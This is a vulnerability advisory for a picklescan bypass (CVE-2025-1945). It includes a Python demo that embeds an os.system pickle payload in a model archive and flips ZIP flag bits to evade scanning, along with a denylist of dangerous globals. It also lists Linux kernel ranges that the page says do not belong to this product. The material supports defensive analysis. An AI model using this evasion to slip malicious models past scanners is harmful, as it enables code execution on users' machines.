CVE-2025-1945
published 2025-03-10


Priority: P353
CVSS 3.1: 9.8 critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS: 0.51% (39.7th percentile)
picklescan before 0.0.23 fails to detect malicious pickle files inside PyTorch model archives when certain ZIP file flag bits are modified. By flipping specific bits in the ZIP file headers, an attacker can embed malicious pickle files that remain undetected by PickleScan while still being successfully loaded by PyTorch's torch.load(). This can lead to arbitrary code execution when loading a compromised model.
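The scanner-versus-loader split the advisory describes, as an added example (this is not picklescan's or PyTorch's code). It builds a small PyTorch-style ZIP archive whose data.pkl references os.system, flips one general-purpose flag bit in that member's local file header and central-directory record, and then scans the archive two ways: through Python's zipfile, which now refuses the member, and by reading the stored bytes straight from the central-directory offsets, which still yields the pickle. The flag bit chosen (bit 0, the PKZIP "encrypted" bit), the denylist, the archive layout and the offset-based reader standing in for a loader that does not enforce the flags are all assumptions of the demo; the advisory itself does not name the bits.

```python
import io
import struct
import zipfile
import pickletools  # walks pickle opcodes without executing them

# Constructed payload: a protocol-0 pickle whose REDUCE would call os.system
# on load. It is only disassembled here, never unpickled.
PAYLOAD = b"cos\nsystem\n(S'echo pwned'\ntR."

# Assumption: a tiny denylist standing in for a real scanner's global list.
DANGEROUS_GLOBALS = {("os", "system"), ("subprocess", "Popen"),
                     ("builtins", "eval"), ("builtins", "exec")}

# Assumption for the demo: bit 0 of the general-purpose flag word (PKZIP
# "encrypted"). Python's zipfile then refuses the member, while the stored
# bytes stay exactly where the central directory says they are.
FLIPPED_BIT = 0x0001

EOCD_SIG, CDH_SIG, LFH_SIG = b"PK\x05\x06", b"PK\x01\x02", b"PK\x03\x04"
EOCD_FMT, CDH_FMT = "<4s4H2LH", "<4s6H3L5H2L"   # 22 and 46 bytes
LFH_FIXED = 30                                   # fixed part of a local file header


def build_model_archive(pickle_bytes: bytes) -> bytes:
    """Minimal PyTorch-style archive: <dir>/data.pkl plus a version file, stored uncompressed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr("model/data.pkl", pickle_bytes)
        zf.writestr("model/version", b"3\n")
    return buf.getvalue()


def central_directory(archive: bytes):
    """Yield (cd_pos, name, flags, compression, compressed_size, local_offset) per entry."""
    eocd = archive.rfind(EOCD_SIG)
    fields = struct.unpack_from(EOCD_FMT, archive, eocd)
    n_entries, pos = fields[4], fields[6]
    for _ in range(n_entries):
        f = struct.unpack_from(CDH_FMT, archive, pos)
        assert f[0] == CDH_SIG, "central directory corrupt"
        name = archive[pos + 46: pos + 46 + f[10]].decode()
        yield pos, name, f[3], f[4], f[8], f[16]
        pos += 46 + f[10] + f[11] + f[12]   # fixed part + name + extra + comment


def flip_flag_bits(archive: bytes, name: str, mask: int) -> bytes:
    """XOR `mask` into the flag word of `name` in both the central-directory record
    and the local file header, so the two headers stay consistent with each other."""
    data = bytearray(archive)
    for cd_pos, entry, flags, _, _, local_off in central_directory(archive):
        if entry == name:
            assert data[local_off:local_off + 4] == LFH_SIG
            struct.pack_into("<H", data, cd_pos + 8, flags ^ mask)     # flags at +8 in the CD record
            struct.pack_into("<H", data, local_off + 6, flags ^ mask)  # flags at +6 in the local header
    return bytes(data)


def find_dangerous_globals(pkl: bytes) -> list:
    """Static check: denylisted GLOBAL references found by disassembly, never by loading."""
    hits = []
    for op, arg, _ in pickletools.genops(pkl):
        if op.name == "GLOBAL":   # a real scanner must also handle STACK_GLOBAL and INST
            module, attr = arg.split(" ", 1)
            if (module, attr) in DANGEROUS_GLOBALS:
                hits.append(f"{module}.{attr}")
    return hits


def scan_archive(archive: bytes, fail_closed: bool) -> dict:
    """Scan every .pkl member through zipfile. fail_closed=False reports a member that
    zipfile refuses to read as clean (the failure mode behind this CVE); fail_closed=True
    reports it as unreadable, which the caller must treat as a detection."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for member in zf.namelist():
            if not member.endswith(".pkl"):
                continue
            try:
                report[member] = find_dangerous_globals(zf.read(member))
            except (RuntimeError, NotImplementedError, zipfile.BadZipFile) as exc:
                report[member] = [f"UNREADABLE:{type(exc).__name__}"] if fail_closed else []
    return report


def read_by_offsets(archive: bytes, name: str) -> bytes:
    """Read a STORED member straight from the central-directory offsets, ignoring the
    flag word. Stand-in (assumption) for a loader whose own ZIP reader does not
    enforce those flags."""
    for _, entry, _, comp, csize, local_off in central_directory(archive):
        if entry == name and comp == zipfile.ZIP_STORED:
            name_len, extra_len = struct.unpack_from("<2H", archive, local_off + 26)
            start = local_off + LFH_FIXED + name_len + extra_len
            return archive[start:start + csize]
    raise KeyError(name)


def demo() -> dict:
    clean = build_model_archive(PAYLOAD)
    evasive = flip_flag_bits(clean, "model/data.pkl", FLIPPED_BIT)
    return {
        "clean_scan": scan_archive(clean, fail_closed=False)["model/data.pkl"],
        "evasive_lenient_scan": scan_archive(evasive, fail_closed=False)["model/data.pkl"],
        "evasive_strict_scan": scan_archive(evasive, fail_closed=True)["model/data.pkl"],
        "loader_view": find_dangerous_globals(read_by_offsets(evasive, "model/data.pkl")),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The practical check this illustrates is the fail-closed rule: a model scanner that cannot read a member must report that member, not skip it, because the loader on the other side may use a different ZIP implementation with different ideas about which header bits matter. Independently of the scanner, refusing archives whose flag words differ from the small set a legitimate exporter produces (and whose local and central headers disagree) removes this class of divergence before torch.load() ever runs.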

Affected

12 ranges (4 picklescan, 8 linux_kernel)

Vendor        Product       Version range                                      Fixed in
mmaitre314    picklescan    < 0.0.23                                           0.0.23
mmaitre314    picklescan    >= 0 < e58e45e0d9e091159c1554f9b04828bbb40b9781    e58e45e0d9e091159c1554f9b04828bbb40b9781
mmaitre314    picklescan    >= 0 < 0.0.23                                      0.0.23
mmaitre314    picklescan    >= 0.0.1 < 0.0.23                                  0.0.23

The four picklescan rows describe the same boundary: every release before 0.0.23 is affected, and the fix is commit e58e45e0d9e091159c1554f9b04828bbb40b9781, shipped in 0.0.23.

The record also lists the following linux_kernel ranges under this CVE. They do not match the product described above (picklescan is a Python package, not a kernel component) and should not be read as affected versions for CVE-2025-1945:

Vendor    Product         Version range             Fixed in
linux     linux_kernel    >= 2.6.35 < 5.4.301       5.4.301
linux     linux_kernel    >= 5.5.0 < 5.10.246       5.10.246
linux     linux_kernel    >= 5.11.0 < 5.15.195      5.15.195
linux     linux_kernel    >= 5.16.0 < 6.1.156       6.1.156
linux     linux_kernel    >= 6.2.0 < 6.6.110        6.6.110
linux     linux_kernel    >= 6.7.0 < 6.12.51        6.12.51
linux     linux_kernel    >= 6.13.0 < 6.16.11       6.16.11
linux     linux_kernel    >= 6.17.0 < 6.17.1        6.17.1

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             3.1       9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd             4.0       5.3     MEDIUM     CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vendor_redhat   (none)    7.0     MEDIUM     (no vector on this record)

The scores disagree because they model different things. The v3.1 vector assumes no user interaction, whereas the v4.0 vector (UI:P) and the Red Hat score reflect that a victim still has to call torch.load() on an attacker-supplied model: the picklescan bug executes nothing by itself, it only removes the detection step that would otherwise sit in front of that load.